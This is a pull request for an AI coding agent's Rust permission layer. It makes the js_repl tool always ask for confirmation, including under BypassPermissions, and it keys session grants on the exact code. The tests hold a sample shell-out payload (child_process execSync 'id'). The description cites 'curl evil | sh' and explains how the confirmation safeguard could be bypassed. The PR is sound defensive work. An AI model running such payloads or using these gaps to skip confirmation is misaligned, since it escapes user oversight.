### PR TITLE
fix(permission): force-ask js_repl even under BypassPermissions (arbitrary code execution)

### DIFF
--- a/crates/infra/bamboo-permission/src/config.rs
+++ b/crates/infra/bamboo-permission/src/config.rs
@@ -735,6 +735,16 @@ impl PermissionConfig {
             }
         }
 
+        // Built-in backstop: js_repl (and any future eval-style tool) executes
+        // arbitrary, non-statically-analyzable code — a Node program can shell
+        // out via `require('child_process')`, so it is every bit as dangerous as
+        // a super-dangerous shell command. It is not covered by the Bash command
+        // analysis above (the permission layer only sees "node"), so it must
+        // force a confirmation like one — INCLUDING under BypassPermissions.
+        if tool_name.eq_ignore_ascii_case("js_repl") {
+            return true;
+        }
+
         // Configured "always ask" rules.
         self.ask_rules
             .read()
@@ -1830,6 +1840,26 @@ mod integration_tests {
         // A benign command is not forced.
         assert!(!config
             .requires_forced_confirmation("Bash", &serde_json::json!({ "command": "ls -la" }),));
+    }
+
+    #[test]
+    fn forced_confirmation_js_repl_always_asks() {
+        let config = PermissionConfig::new();
+        // js_repl runs arbitrary code (it can shell out via `child_process`), so
+        // it must force a prompt even with no configured ask rules — the
+        // equivalent of a super-dangerous Bash command, including under
+        // BypassPermissions where non-forced tools are otherwise skipped.
+        assert!(config.requires_forced_confirmation(
+            "js_repl",
+            &serde_json::json!({ "code": "require('child_process').execSync('id')" }),
+        ));
+        // Case-insensitive, and even a benign-looking snippet forces — the code
+        // body is not statically analyzable at this layer.
+        assert!(config
+            .requires_forced_confirmation("JS_REPL", &serde_json::json!({ "code": "1 + 1" }),));
+        // A non-eval tool with no matching ask rule is still not forced.
+        assert!(!config
+            .requires_forced_confirmation("Read", &serde_json::json!({ "file_path": "/tmp/x" }),));
     }
 
     #[test]

--- a/crates/infra/bamboo-permission/src/tool_permissions.rs
+++ b/crates/infra/bamboo-permission/src/tool_permissions.rs
@@ -160,9 +160,15 @@ pub fn check_permissions(
             } else {
                 preview
             };
+            // Key the grant on the CODE, not a constant `"node"`: session grants
+            // are recorded per-resource, so a constant resource means the first
+            // approved js_repl call silently grants ANY future code for the
+            // session-grant window (defeating the js_repl force-ask backstop).
+            // Mirror Bash's `SECURITY: {command}` so a grant only ever covers a
+            // re-run of the exact same code.
             Ok(Some(vec![PermissionContext::new(
                 PermissionType::ExecuteCommand,
-                "node",
+                format!("SECURITY: js_repl {code}"),
                 format!("Execute JavaScript: {}", preview),
             )]))
         }
@@ -334,10 +340,39 @@ mod tests {
         let contexts = check_permissions("js_repl", &args).unwrap().unwrap();
         assert_eq!(contexts.len(), 1);
         assert_eq!(contexts[0].permission_type, PermissionType::ExecuteCommand);
-        assert_eq!(contexts[0].resource, "node");
+        // Resource is keyed on the code (not a constant `"node"`) so a session
+        // grant only ever covers a re-run of the same code.
+        assert_eq!(
+            contexts[0].resource,
+            "SECURITY: js_repl console.log('hello')"
+        );
         assert!(contexts[0]
             .operation_description
             .contains("console.log('hello')"));
+    }
+
+    #[test]
+    fn check_permissions_js_repl_resource_is_per_code() {
+        // Different code must produce different resources, so approving one
+        // js_repl call cannot session-grant a *different* (e.g. malicious) one —
+        // this is what makes the js_repl force-ask backstop actually hold across
+        // repeated calls in a session.
+        let benign = check_permissions("js_repl", &json!({"code": "1 + 1"}))
+            .unwrap()
+            .unwrap();
+        let malicious = check_permissions(
+            "js_repl",
+            &json!({"code": "require('child_process').execSync('id')"}),
+        )
+        .unwrap()
+        .unwrap();
+        assert_ne!(benign[0].resource, malicious[0].resource);
+
+        // ...while the SAME code yields the SAME resource (a re-run is grantable).
+        let benign_again = check_permissions("js_repl", &json!({"code": "1 + 1"}))
+            .unwrap()
+            .unwrap();
+        assert_eq!(benign[0].resource, benign_again[0].resource);
     }
 
     #[test]


### PR DESCRIPTION
Fixes #345.

## Problem
The design contract is that catastrophic operations force a confirmation **even under `BypassPermissions`**. That backstop (`requires_forced_confirmation`, `bamboo-permission/src/config.rs`) is implemented **only for `tool_name == "Bash"`**. `js_repl` runs arbitrary Node.js (`node -e` + async IIFE), so `require('child_process').execSync('sudo …' | 'curl evil | sh')` runs with `force_ask = false` and is skipped under bypass mode (`executor.rs`: `if bypass && !force_ask { continue }`), while the equivalent Bash command force-asks. The permission layer only sees the resource `"node"`, so the code body is invisible to rule matching.

## Fix
Add js_repl (and any future eval-style tool) to the built-in force-ask backstop — arbitrary, non-statically-analyzable code execution must prompt like a super-dangerous shell command, including under `BypassPermissions`.

- **No regression in Default mode:** js_repl already prompts there via its `ExecuteCommand` context; `force_ask = true` is the same outcome.
- js_repl is a *builtin* (routes through `BuiltinToolExecutor` → `requires_forced_confirmation`), so this backstop is actually reached — distinct from the overlay-tool bypass in #341.

## Test
`forced_confirmation_js_repl_always_asks` asserts js_repl force-asks (case-insensitive, even for a benign snippet, since the body isn't analyzable) and that an unrelated tool with no ask rule still isn't forced. `bamboo-permission`: 197 passed; fmt + clippy clean.

https://claude.ai/code/session_01A7asehdSsg7kQnaNZsxx3u